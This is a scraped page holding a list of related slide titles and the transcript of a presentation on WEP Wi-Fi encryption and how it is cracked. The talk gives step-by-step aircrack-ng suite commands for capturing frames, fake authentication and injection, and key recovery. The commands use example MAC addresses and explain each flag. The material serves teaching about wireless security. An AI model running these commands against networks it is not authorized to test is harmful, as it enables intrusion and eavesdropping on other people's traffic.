Wireless Encryption: WEP and cracking it. Eric Shea.

Slides:



Advertisements
Similar presentations
Crack WEP Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
Advertisements

Wireless Cracking By: Christopher Zacky.
Crack WPA Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
WLAN Security: Cracking WEP/WPA
Local Wireless Network - An wireless Access Point (AP) which is the bridge the ethernet network and the wireless network -The AP protect its wireless network.
Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.
1 MD5 Cracking One way hash. Used in online passwords and file verification.
How secure are b Wireless Networks? By Ilian Emmons University of San Diego.
Wireless Networks: Signaling and Security William Tucker CEN 4516: Computer Networks FGCU: Fort Myers, FL: 09/05.
Security in IEEE wireless networks Piotr Polak University Politehnica of Bucharest, December 2008.
The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens.
Security in Wireless LAN Layla Pezeshkmehr CS 265 Fall 2003-SJSU Dr.Mark Stamp.
Wireless Router Setup. Internet Cable Internet Cable (Blue) Machine Cable (Yellow) Power Plug (Black) Reset Button (Red)
Access Control and Site Security (Part 2) (Tuesday, January 22, 2008) © Abdou Illia – Spring 2008.
Wireless Security Presentation by Paul Petty and Sooner Brooks-Heath.
WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.
Wireless Insecurity.
Improving Security. Networking Terms Node –Any device on a network Protocol –Communication standards Host –A node on a network Workstation 1.A PC 2.A.
Wireless Security Focus on Encryption Steps to secure a Wi-Fi Network.
 Any unauthorized device that provides wireless access  Implemented using software, hardware, or a combination of both  It can be intentional or unintentionally.
WLAN What is WLAN? Physical vs. Wireless LAN
Security+ Guide to Network Security Fundamentals, Fourth Edition
Wireless Attacks. Set up the APs Computer IP: Subnet Mask: Router IP address: –
Access Control and Site Security (Part 2) (January 28, 2015) © Abdou Illia – Spring 2015.
Computer Networks. Network Connections Ethernet Networks Single wire (or bus) runs to all machines Any computer can send info to another computer Header.
CSC-682 Advanced Computer Security
Wireless Networking.
Certified Wireless Network Administrator (CWNA) PW0-105 Chapter Network Security Architecture.
A History of WEP The Ups and Downs of Wireless Security.
Chapter Network Security Architecture Security Basics Legacy security Robust Security Segmentation Infrastructure Security VPN.
Ethical Hacking Defeating Wireless Security. 2 Contact Sam Bowne Sam Bowne Computer Networking and Information Technology Computer Networking and Information.
Wireless Network Security Dr. John P. Abraham Professor UTPA.
Lesson 20-Wireless Security. Overview Introduction to wireless networks. Understanding current wireless technology. Understanding wireless security issues.
Wireless Insecurity By: No’eau Kamakani Robert Whitmire.
Wireless Networking Concepts By: Forrest Finkler Computer Science 484 Networking Concepts.
Environment => Office, Campus, Home  Impact How, not Whether A Checklist for Wireless Access Points.
1 C-DAC/Kolkata C-DAC All Rights Reserved Computer Security.
WLAN Security Issues, technologies, and alternative solutions Hosam M. Badreldin Western Illinois University December 2011 Hosam Badreldin – Fall 2011.
Copyright Security-Assessment.com 2005 Wireless Security by Nick von Dadelszen.
CWSP Guide to Wireless Security Chapter 2 Wireless LAN Vulnerabilities.
Wireless Networking & Security Greg Stabler Spencer Smith.
 Process of converting readable data into unreadable characters to prevent unauthorized access. › Encrypt – make unreadable › Decrypt – make readable.
Link-Layer Protection in i WLANs With Dummy Authentication Will Mooney, Robin Jha.
WLANs & Security Standards (802.11) b - up to 11 Mbps, several hundred feet g - up to 54 Mbps, backward compatible, same frequency a.
The University of Bolton School of Business & Creative Technologies Wireless Networks - Security 1.
Solving the Security Risks of WLAN Tuukka Karvonen
Wireless Security Rick Anderson Pat Demko. Wireless Medium Open medium Broadcast in every direction Anyone within range can listen in No Privacy Weak.
KSU 2015-Summer Cyber Security | Group 1 | Seul Alice Bang Get a Wifi Password.
University of Kansas Motivation Wireless networks based on the IEEE standard require lengthy layer two configuration parameters to be set SSID (Network.
CSE 5/7349 – April 5 th 2006 Wireless Networking.
Wireless Security John Himmelein Erick Andrew Christian Adam Varun Bapna.
Wireless Security Presented by Colby Carlisle. Wireless Networking Defined A type of local-area network that uses high-frequency radio waves rather than.
Authentication has three means of authentication Verifies user has permission to access network 1.Open authentication : Each WLAN client can be.
IEEE Security Specifically WEP, WPA, and WPA2 Brett Boge, Presenter CS 450/650 University of Nevada, Reno.
1 © 2004, Cisco Systems, Inc. All rights reserved. Wireless LAN (network) security.
Erik Nicholson COSC 352 March 2, WPA Wi-Fi Protected Access New security standard adopted by Wi-Fi Alliance consortium Ensures compliance with different.
WPA Cracking with Rainbow Tables For Educational Purposes Only Kurt Wondra November 18 th, 2010  1) Scanning for Vulnerable Networks  2) Capturing Usable.
Wireless Hacking Lesson 13. Reminder As a reminder, remember that the tools and techniques that you learn this semester are only to be used on systems.
CWNA Guide to Wireless LANs, Third Edition Chapter 9: Wireless LAN Security Vulnerabilities.
Access Point Extender/bridge Radio card SSID - Service Set Identifier “An identifier attached to packets sent over the wireless LAN that functions as a.
Tightening Wireless Networks By Andrew Cohen. Question Why more and more businesses aren’t converting their wired networks into wireless networks?
Wired Equivalent Privacy. INTRODUCTION Wired Equivalent Privacy (WEP) is a security algorithm for IEEE wireless networks. Introduced as part of.
Module 48 (Wireless Hacking)
Wireless Attacks: WEP Module Type: Basic Method Module Number: 0x00
Wireless Security Ian Bodley.
Breaking into Wi-Fi Networks
WLAN Security Antti Miettinen.
Antti Miettinen (modified by JJ)
Security Issues with Wireless Protocols
Presentation transcript:

Wireless Encryption: WEP and cracking it. Eric Shea

Background on Wi-Fi over-the-air protocol a/b/g/n: Speeds Frequencies Range ◦ Physical Obstructions ◦ Example: Cordless Phone

Wireless Security Myths MAC address limiting Hidden SSID Using WEP Disable DHCP

Wireless Frames/Packets Framing: ◦ Management - clear  Authentication - encrypted ◦ Control ◦ Data - encrypted Error detection

Collecting Frames Important Part: ◦ Initalization Vector or IV, is prepended onto packets and its based on a pre-shared key that all the authenticated clients know. ◦ Included in every authorization frame. ◦ In some data frames.

Wired Equivalent Privacy (WEP) 1997, deprecated Intended to protect data Prevent unauthorized access to the network Hexadecimal 64/128/256 bit keys

Authentication The client station sends an authentication request to the Access Point. The Access Point sends back a clear-text challenge. The client has to encrypt the challenge text using the configured WEP key, and send it back in another authentication request. The Access Point decrypts the material, and compares it with the clear-text it had sent. Depending on the success of this comparison, the Access Point sends back a positive or negative response.

War Chalking / War Driving War Chalking - practice of marking sidewalks and walls with special symbols to indicate that wireless access. War Driving - driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get- into wireless networks.

Alternative Security WPA/WPA2 ◦ random10 digit or longer key ◦ (1000) Single core computer 500 years to crack VPN ◦ Required authentication ◦ Username/password

Cracking WEP Tools = Aircrack-ng Suite / Kismet Kismet ◦ Discover wireless networks Airodump-ng ◦ Capturing packets Aircrack-ng ◦ Brute force crack method Aireplay ◦ Packet injection

Kismet Demo

Capture packets airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0 -c 9 is the channel for the wireless network --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminate extraneous traffic. -w capture is file name prefix for the file which will contain the IVs. ath0 is the interface name.

Packet Injection aireplay-ng e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0 -1 means fake authentication 0 reassociation timing in seconds -e teddy is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:0F:B5:88:AC:82 is our card MAC address ath0 is the wireless interface name

Cracking the captured packets aircrack-ng -b 00:14:6C:7E:40:80 output*.cap -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP. output*.cap selects all files starting with “output” and ending in ”.cap”.

Demo Aircrack-ng Suite

Aircrack-ng Suite Simple wep cracking tutorial ◦ ng.org/doku.php?id=simple_wep_crack ng.org/doku.php?id=simple_wep_crack